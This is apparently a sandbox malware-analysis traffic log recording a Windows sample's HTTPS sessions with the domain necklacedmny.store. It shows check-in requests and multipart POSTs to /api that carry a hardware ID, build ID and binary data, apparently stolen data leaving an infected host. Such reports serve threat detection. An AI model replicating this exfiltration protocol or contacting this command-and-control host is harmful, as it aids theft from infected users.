                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 52
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:05 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                            2024-10-31 16:26:06 UTC1014INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:06 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=0gpvqof3724stk2bc0h8egk5ft; expires=Mon, 24-Feb-2025 10:12:44 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tyAqxQSXBFgZUGz78TO6ZgqBQrHrOxr8lwaKtfhGBGlptJz8z%2Fn6d7Rl1KBye9rVl6ZnTJYDF%2BHkbtXfGA0ii0pUwqGJ62Yv09eNtn2gAFaUxLO9VANYli%2BPg8to4VzQ7eACGMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db50135fe0a8d29-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2043754&cwnd=251&unsent_bytes=0&cid=233b9b115ac48e28&ts=1254&x=0"
                                                                            2024-10-31 16:26:06 UTC355INData Raw: 32 35 37 35 0d 0a 68 57 32 6a 2b 51 63 2f 69 2f 31 75 58 34 51 77 4a 47 33 77 6b 4d 48 49 34 53 66 67 43 4f 32 54 7a 5a 32 50 45 35 6a 68 67 75 66 2b 54 39 58 62 50 51 75 6e 33 78 30 36 70 67 70 51 48 34 58 31 37 65 71 41 51 38 49 79 69 2f 4b 68 37 75 6f 2f 75 70 66 76 78 62 38 4c 77 70 56 30 57 71 66 66 43 79 65 6d 43 6e 38 57 30 76 57 76 36 74 73 46 68 57 4b 50 38 71 48 2f 37 6e 6a 33 6b 65 36 45 37 51 48 45 6b 57 4a 63 37 35 77 43 4d 75 46 56 51 51 79 61 2f 71 69 6c 69 55 72 43 4a 4d 2f 32 74 37 2b 31 4d 64 57 45 39 6f 62 49 44 4e 43 53 4a 55 4b 6e 68 6b 77 36 36 68 49 65 54 35 48 31 6f 36 53 48 51 34 74 67 68 66 75 70 2f 75 74 35 36 49 6a 6b 6a 2b 30 50 78 35 42 6f 56 66 75 52 43 44 58 71 55 30 73 4d 30 72 7a 6a 72 5a 73 46 32 69 72 63 77 36 7a 75 2f
                                                                            Data Ascii: 2575hW2j+Qc/i/1uX4QwJG3wkMHI4SfgCO2TzZ2PE5jhguf+T9XbPQun3x06pgpQH4X17eqAQ8Iyi/Kh7uo/upfvxb8LwpV0WqffCyemCn8W0vWv6tsFhWKP8qH/7nj3ke6E7QHEkWJc75wCMuFVQQya/qiliUrCJM/2t7+1MdWE9obIDNCSJUKnhkw66hIeT5H1o6SHQ4tghfup/ut56Ijkj+0Px5BoVfuRCDXqU0sM0rzjrZsF2ircw6zu/
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 4f 6d 4e 42 44 62 74 56 31 51 45 6d 2f 2b 75 71 6f 35 50 6a 57 6d 50 39 71 58 31 34 6e 76 2b 6a 75 32 44 35 77 2b 42 31 53 56 61 38 64 39 55 66 63 56 58 56 67 69 65 35 4f 47 51 77 31 72 4d 63 38 2f 32 6f 37 2b 31 4d 66 4b 47 34 34 62 73 41 4d 4b 54 62 6b 2f 70 6a 51 6f 77 34 30 42 41 43 70 7a 34 6f 4c 69 4a 53 34 52 70 68 76 71 6d 2b 75 70 31 75 73 32 67 67 76 39 50 6d 64 74 45 55 4f 4b 54 42 69 72 6d 45 6c 6c 42 69 37 4b 6b 70 73 4d 64 77 6d 36 4f 39 61 37 37 34 33 2f 2b 6a 2b 61 4c 36 67 44 48 6b 57 56 61 34 35 63 45 50 4f 74 5a 53 51 2b 58 2f 36 65 73 6a 30 53 48 4b 73 47 78 71 4f 65 74 4b 62 71 74 35 34 62 31 54 66 53 59 61 31 50 75 69 55 77 69 71 45 73 47 43 4a 36 79 2b 2b 71 4e 51 49 31 34 6a 75 4f 71 38 66 39 39 2f 34 58 74 68 75 6b 50 78 4a 78 6f
                                                                            Data Ascii: OmNBDbtV1QEm/+uqo5PjWmP9qX14nv+ju2D5w+B1SVa8d9UfcVXVgie5OGQw1rMc8/2o7+1MfKG44bsAMKTbk/pjQow40BACpz4oLiJS4Rphvqm+up1us2ggv9PmdtEUOKTBirmEllBi7KkpsMdwm6O9a7743/+j+aL6gDHkWVa45cEPOtZSQ+X/6esj0SHKsGxqOetKbqt54b1TfSYa1PuiUwiqEsGCJ6y++qNQI14juOq8f99/4XthukPxJxo
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 77 69 71 45 73 47 43 4a 36 79 2b 2b 71 50 54 49 4a 68 68 66 57 76 2b 4f 42 30 2b 59 54 6a 69 4f 41 46 7a 35 78 68 55 65 43 53 43 6a 33 68 56 6b 4d 64 6c 2f 75 76 70 73 4d 4c 77 6d 32 58 73 66 65 2f 77 6e 62 73 67 4d 2b 47 39 67 61 42 68 43 74 45 71 5a 67 41 66 62 34 53 51 51 71 61 2b 61 57 69 67 31 65 48 5a 49 54 77 70 66 6e 73 66 50 61 46 34 49 54 6e 43 63 32 62 59 6c 72 37 6a 51 6b 37 39 46 67 47 51 64 4c 31 75 2b 72 62 42 62 52 36 6d 4f 43 35 76 64 68 79 39 49 33 6e 6b 36 63 51 6a 34 49 6c 57 75 58 66 56 48 33 74 55 6b 6f 49 6d 76 53 6e 6f 6f 78 4b 69 33 69 4f 2f 61 48 74 36 6e 48 7a 6a 65 2b 4a 37 67 4c 47 6c 6d 35 58 35 4a 73 4c 50 4b 59 63 42 67 69 4b 73 76 76 71 74 56 57 50 5a 71 48 36 6f 2f 61 74 62 72 53 61 6f 49 4c 72 54 35 6e 62 59 56 48 68 6c
                                                                            Data Ascii: wiqEsGCJ6y++qPTIJhhfWv+OB0+YTjiOAFz5xhUeCSCj3hVkMdl/uvpsMLwm2Xsfe/wnbsgM+G9gaBhCtEqZgAfb4SQQqa+aWig1eHZITwpfnsfPaF4ITnCc2bYlr7jQk79FgGQdL1u+rbBbR6mOC5vdhy9I3nk6cQj4IlWuXfVH3tUkoImvSnooxKi3iO/aHt6nHzje+J7gLGlm5X5JsLPKYcBgiKsvvqtVWPZqH6o/atbrSaoILrT5nbYVHhl
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 58 51 67 69 57 39 4b 7a 71 7a 51 57 46 63 73 2b 70 37 39 44 4b 52 4c 69 69 32 73 58 34 51 64 6a 62 59 6c 47 70 78 30 77 78 35 56 35 4f 41 4a 54 37 72 36 43 4b 54 6f 35 68 69 2f 32 6d 2b 75 74 77 2f 34 62 68 67 65 73 46 78 35 68 6d 55 75 61 51 42 48 32 6f 45 6b 45 58 30 71 72 6a 6a 35 52 4f 6a 47 7a 50 37 75 48 6d 72 58 62 32 77 37 6a 46 36 77 62 48 6e 57 42 52 36 4a 6b 45 4f 4f 35 57 52 77 6d 55 38 61 79 75 68 6b 53 4e 62 6f 50 2f 70 66 37 73 66 66 47 4d 36 34 43 6e 51 59 47 63 66 52 32 78 33 7a 30 2b 38 45 56 57 41 39 4c 74 37 62 50 44 51 6f 34 71 31 37 47 75 37 65 64 37 39 49 62 76 67 4f 51 41 78 70 5a 6a 55 65 4f 57 42 44 76 70 57 31 51 4d 6e 76 79 6b 70 49 39 4c 6a 32 43 4d 2f 4f 2b 78 72 58 62 69 77 37 6a 46 79 77 6a 4d 74 57 35 52 37 74 38 54 63 2f
                                                                            Data Ascii: XQgiW9KzqzQWFcs+p79DKRLii2sX4QdjbYlGpx0wx5V5OAJT7r6CKTo5hi/2m+utw/4bhgesFx5hmUuaQBH2oEkEX0qrjj5ROjGzP7uHmrXb2w7jF6wbHnWBR6JkEOO5WRwmU8ayuhkSNboP/pf7sffGM64CnQYGcfR2x3z0+8EVWA9Lt7bPDQo4q17Gu7ed79IbvgOQAxpZjUeOWBDvpW1QMnvykpI9Lj2CM/O+xrXbiw7jFywjMtW5R7t8Tc/
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 6c 65 72 6a 38 73 4e 7a 68 58 71 66 38 75 33 4f 2b 33 4c 73 69 4f 32 4a 70 78 43 50 67 69 56 61 35 64 39 55 66 65 42 64 54 77 79 64 38 36 71 6d 6a 6b 43 4c 62 34 37 33 71 2f 58 6e 63 66 79 46 34 59 44 74 44 4d 43 52 62 46 72 68 6d 41 38 76 70 68 77 47 43 49 71 79 2b 2b 71 71 51 70 42 6b 6e 37 47 77 73 66 51 78 2f 59 2b 67 33 61 63 4c 79 35 52 68 57 75 57 5a 43 54 76 72 55 30 6b 4f 6b 76 32 6e 6f 59 70 44 67 32 65 4b 2f 4b 76 74 35 33 72 31 6a 2b 6d 4a 36 6b 2b 50 32 32 4a 46 71 63 64 4d 44 4f 74 63 53 41 69 45 73 72 7a 6b 6d 67 57 46 5a 73 2b 70 37 2f 37 68 66 76 6d 4d 34 34 62 6d 42 64 4f 4a 61 56 54 68 6d 67 41 32 36 46 52 55 43 5a 33 37 6f 4b 6d 4b 51 6f 70 6d 68 66 4b 6f 76 36 4d 78 2f 5a 75 67 33 61 63 73 31 6f 74 6f 48 66 62 52 46 58 33 68 58 67 5a
                                                                            Data Ascii: lerj8sNzhXqf8u3O+3LsiO2JpxCPgiVa5d9UfeBdTwyd86qmjkCLb473q/XncfyF4YDtDMCRbFrhmA8vphwGCIqy++qqQpBkn7GwsfQx/Y+g3acLy5RhWuWZCTvrU0kOkv2noYpDg2eK/Kvt53r1j+mJ6k+P22JFqcdMDOtcSAiEsrzkmgWFZs+p7/7hfvmM44bmBdOJaVThmgA26FRUCZ37oKmKQopmhfKov6Mx/Zug3acs1otoHfbRFX3hXgZ
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 61 2b 46 53 6f 31 6a 68 76 57 6e 2f 4f 31 31 2f 6f 54 6c 68 75 73 45 78 70 68 71 57 65 43 52 42 54 4b 6d 48 41 59 49 69 72 4c 37 36 71 4a 65 67 57 61 43 73 62 43 78 39 44 48 39 6a 36 44 64 70 77 50 50 6e 6d 56 58 37 35 73 4a 4f 2b 78 58 52 67 53 52 2f 61 65 73 68 30 71 43 59 59 62 77 71 66 72 6e 65 76 79 4f 34 34 50 68 54 34 2f 62 59 6b 57 70 78 30 77 64 2f 56 39 4b 43 4e 4c 74 37 62 50 44 51 6f 34 71 31 37 47 6b 38 2b 6c 32 2b 6f 37 6a 6a 65 49 4c 79 35 35 6c 56 66 75 58 44 44 72 30 51 45 59 47 6c 2f 36 67 71 6f 64 44 69 32 79 4d 39 65 2b 78 72 58 62 69 77 37 6a 46 79 67 50 47 73 6d 4a 47 71 59 42 43 4a 4b 5a 56 53 6b 2f 4b 73 71 4b 68 69 55 71 50 61 59 6e 79 70 50 72 6e 63 50 32 4c 37 5a 66 6b 41 4d 36 66 5a 56 4c 76 6d 51 30 79 34 46 56 50 44 70 72 31
                                                                            Data Ascii: a+FSo1jhvWn/O11/oTlhusExphqWeCRBTKmHAYIirL76qJegWaCsbCx9DH9j6DdpwPPnmVX75sJO+xXRgSR/aesh0qCYYbwqfrnevyO44PhT4/bYkWpx0wd/V9KCNLt7bPDQo4q17Gk8+l2+o7jjeILy55lVfuXDDr0QEYGl/6gqodDi2yM9e+xrXbiw7jFygPGsmJGqYBCJKZVSk/KsqKhiUqPaYnypPrncP2L7ZfkAM6fZVLvmQ0y4FVPDpr1
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 75 6c 66 49 58 32 76 2f 6a 36 66 72 72 4e 6f 49 71 6e 56 2f 6a 62 62 46 72 79 6a 68 6f 77 39 6c 55 47 4d 4e 79 79 75 2b 72 62 42 62 64 70 67 66 2b 6f 36 66 77 38 33 5a 58 71 67 76 63 49 31 70 51 6c 45 36 6d 5a 54 47 57 31 48 41 59 4c 67 37 4c 37 2b 74 45 65 31 7a 6e 59 6f 66 33 67 6f 32 69 36 6c 61 44 64 74 55 47 42 69 53 55 46 71 64 67 50 4c 2f 52 55 52 52 6d 52 74 5a 32 55 70 46 2b 50 62 4a 6a 67 6b 63 48 71 61 2f 65 46 39 35 53 72 47 73 4b 56 61 31 72 2f 33 30 4a 39 36 52 49 65 4e 74 4b 36 34 35 58 4e 42 5a 6f 71 31 37 47 61 2f 4f 4e 2f 2f 5a 58 78 79 4d 41 56 7a 4a 31 79 54 4b 6e 52 54 44 75 6d 43 68 5a 42 30 76 61 79 36 74 73 56 30 44 48 61 6f 76 69 76 76 32 36 30 6d 71 43 54 70 31 65 54 31 53 56 50 71 63 64 4d 65 75 56 41 56 41 6d 52 35 4b 44 74 76
                                                                            Data Ascii: ulfIX2v/j6frrNoIqnV/jbbFryjhow9lUGMNyyu+rbBbdpgf+o6fw83ZXqgvcI1pQlE6mZTGW1HAYLg7L7+tEe1znYof3go2i6laDdtUGBiSUFqdgPL/RURRmRtZ2UpF+PbJjgkcHqa/eF95SrGsKVa1r/30J96RIeNtK645XNBZoq17Ga/ON//ZXxyMAVzJ1yTKnRTDumChZB0vay6tsV0DHaovivv260mqCTp1eT1SVPqcdMeuVAVAmR5KDtv
                                                                            2024-10-31 16:26:06 UTC1028INData Raw: 50 78 4b 7a 78 34 33 62 73 6b 71 32 69 36 51 6a 41 6a 58 56 4b 35 74 39 43 66 65 41 53 48 6c 33 63 73 71 65 37 77 78 33 53 4f 4e 53 6b 2f 4b 69 39 49 2b 58 4e 2b 63 58 78 54 35 6e 4a 4b 78 33 37 33 31 52 39 6f 56 46 55 48 5a 54 78 74 61 6e 45 65 37 78 4e 67 66 61 75 36 66 31 6d 39 63 7a 4f 73 38 59 78 2f 34 35 6d 55 2b 65 59 47 69 79 6d 48 41 59 41 30 71 71 61 36 73 73 46 76 53 54 50 36 65 2b 6e 72 55 54 35 6a 65 36 43 38 52 36 4d 76 47 74 61 36 49 6b 63 4b 75 6b 64 61 44 6d 7a 73 75 33 71 68 51 58 61 4f 4d 47 78 71 2b 36 74 4b 61 72 52 75 39 43 30 57 4a 48 4a 65 68 50 77 33 78 70 39 76 67 41 49 54 34 43 79 2b 2b 72 45 52 70 42 34 69 66 4b 35 2f 4b 70 50 78 4b 54 75 67 75 59 5a 30 5a 5a 70 66 4f 71 4f 42 67 50 59 52 30 55 42 6e 50 57 31 75 38 4d 4c 77 6d
                                                                            Data Ascii: PxKzx43bskq2i6QjAjXVK5t9CfeASHl3csqe7wx3SONSk/Ki9I+XN+cXxT5nJKx3731R9oVFUHZTxtanEe7xNgfau6f1m9czOs8Yx/45mU+eYGiymHAYA0qqa6ssFvSTP6e+nrUT5je6C8R6MvGta6IkcKukdaDmzsu3qhQXaOMGxq+6tKarRu9C0WJHJehPw3xp9vgAIT4Cy++rERpB4ifK5/KpPxKTuguYZ0ZZpfOqOBgPYR0UBnPW1u8MLwm
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 31 65 66 37 0d 0a 2b 2b 6e 72 58 44 77 6b 2b 32 4b 34 45 50 48 6c 57 73 64 39 74 45 56 66 66 41 53 48 6c 7a 63 73 72 48 71 32 77 58 46 5a 49 4c 77 72 50 48 75 59 2b 69 46 34 35 50 6b 53 50 2b 6c 51 46 44 6b 6d 67 49 36 32 47 78 6e 42 59 4c 2f 72 4b 33 42 5a 59 56 38 6a 4d 2b 52 79 50 78 32 36 73 48 47 68 76 45 4d 67 64 55 6c 52 61 6e 48 54 42 7a 73 51 6b 73 41 6c 62 43 44 72 5a 56 47 77 69 54 50 39 65 2b 6e 72 56 54 33 6a 75 57 4c 34 45 33 67 6b 58 56 51 35 70 68 4f 48 65 46 45 52 55 2f 63 73 71 2f 71 32 77 57 44 59 4a 2f 38 6f 50 69 68 64 75 43 45 6f 4d 75 6e 41 59 48 44 4a 56 7a 6a 6a 77 45 79 34 52 35 41 41 5a 79 79 76 4f 53 61 42 5a 51 71 31 36 4c 68 76 2f 38 78 6f 73 4f 6e 68 76 55 64 78 35 68 7a 58 71 36 68 4d 68 44 30 56 56 59 4d 30 4d 4f 75 72 70
                                                                            Data Ascii: 1ef7++nrXDwk+2K4EPHlWsd9tEVffASHlzcsrHq2wXFZILwrPHuY+iF45PkSP+lQFDkmgI62GxnBYL/rK3BZYV8jM+RyPx26sHGhvEMgdUlRanHTBzsQksAlbCDrZVGwiTP9e+nrVT3juWL4E3gkXVQ5phOHeFERU/csq/q2wWDYJ/8oPihduCEoMunAYHDJVzjjwEy4R5AAZyyvOSaBZQq16Lhv/8xosOnhvUdx5hzXq6hMhD0VVYM0MOurp


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549706188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:07 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12840
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:07 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:08 UTC1019INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:08 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=242qc5d8lmd2ug8qv0ur0jvnce; expires=Mon, 24-Feb-2025 10:12:47 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEr37A0bCHnUKQiC0UPOcelSQyLseBW%2F5Ii48JgsIH37qekwTKPORRvRHg8SI6MP33Cpkn77N3fXEJaCfHDRclZWKJv%2FH8lB2QaLEg4lWzLtLB58WWOW8itAIESEv3FsAXk%2B%2FM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db50144db1d4690-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=2419381&cwnd=239&unsent_bytes=0&cid=823e56c8cdaacba6&ts=1514&x=0"
                                                                            2024-10-31 16:26:08 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 16:26:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549707188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:09 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15082
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:09 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:10 UTC1024INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:10 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=9au3gaarvkirerl24oqfei8qqp; expires=Mon, 24-Feb-2025 10:12:48 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D12P63X2ezho2O8AklaleWYuR%2FW%2BM%2FmBuSluXWEFNnbxtwTOb3gMPy6Hs5blJuFE%2BzGbcZc3CCjdlZ2oQxUGtxfls%2Bbol96%2BoCJ37N5VJFOa4eHdTON6Hp72MvRp50OTfiM1D44%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db50152bc2f0c03-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=1794299&cwnd=244&unsent_bytes=0&cid=8586eea8d5a04103&ts=1247&x=0"
                                                                            2024-10-31 16:26:10 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 16:26:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549708188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:11 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20572
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:11 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                            2024-10-31 16:26:13 UTC1018INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:13 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=iiemcqhqn93kbhc59vumh98n0g; expires=Mon, 24-Feb-2025 10:12:51 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QaBMoum%2FvEn0FovNicnE5E3LE5flSupjdu9CE4Ed3CWrKVyzGqGtu4qGHcVYRbV3YgzIaKnU9mb3JwPu05FMw9IhZ7Cgi9TsRyUbyogvFVTTctg%2FaJTF%2FtyjIJI60bGhYWnNQmg%3D"}],"group":"cf-nel","max_age":604800}
